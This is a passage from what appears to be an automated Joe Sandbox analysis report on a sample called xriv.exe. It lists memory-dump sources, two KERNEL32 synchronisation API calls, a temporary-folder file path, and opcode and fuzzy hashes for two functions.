                                                                      • WaitForSingleObjectEx.KERNEL32(000000FF,00000000,?,011E7157,00000064,?,?,?,011D3E30,0120C468,9BC7B195,?,00000000,011F8818,000000FF), ref: 011E71F8
                                                                      • EnterCriticalSection.KERNEL32(01209708,?,011E7157,00000064,?,?,?,011D3E30,0120C468,9BC7B195,?,00000000,011F8818,000000FF), ref: 011E71FF
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                      • String ID:
                                                                      • API String ID: 3269011525-0
                                                                      • Opcode ID: 460c5b292146e3ce9d4c25c26cbc261aea714719de06ce5beab7bf0b426f3a55
                                                                      • Instruction ID: 9228c690ffdd35d274e01e606f53dd938d777e46e0c2aed8a6a052eedb7fa331
                                                                      • Opcode Fuzzy Hash: 460c5b292146e3ce9d4c25c26cbc261aea714719de06ce5beab7bf0b426f3a55
                                                                      • Instruction Fuzzy Hash: 77E09273546124EBDF2F1F92EC0DAC93E59FB48A65B020124F61E521B6C76158C08BD2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 011D0000, based on PE: true
                                                                      • Associated: 0000000F.00000002.403127063.00000000011D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403157260.00000000011FE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403174597.0000000001208000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.403182580.000000000120D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_11d0000_xriv.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                                                                      • API String ID: 0-2325939117
                                                                      • Opcode ID: d23c6c57913cf096430df6ff221941d47a3598ed23ca4169fd58fa9c4d3d4792
                                                                      • Instruction ID: e93297ca431be00565a310f9b1d7b078b1d5f69f3f3fc11870f4556c2b056b08
                                                                      • Opcode Fuzzy Hash: d23c6c57913cf096430df6ff221941d47a3598ed23ca4169fd58fa9c4d3d4792
                                                                      • Instruction Fuzzy Hash: 8741F570E04A05AFCB2ADFDD9C88A9EBFF8EF99314F14006AE505D7241D7718A40CB95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%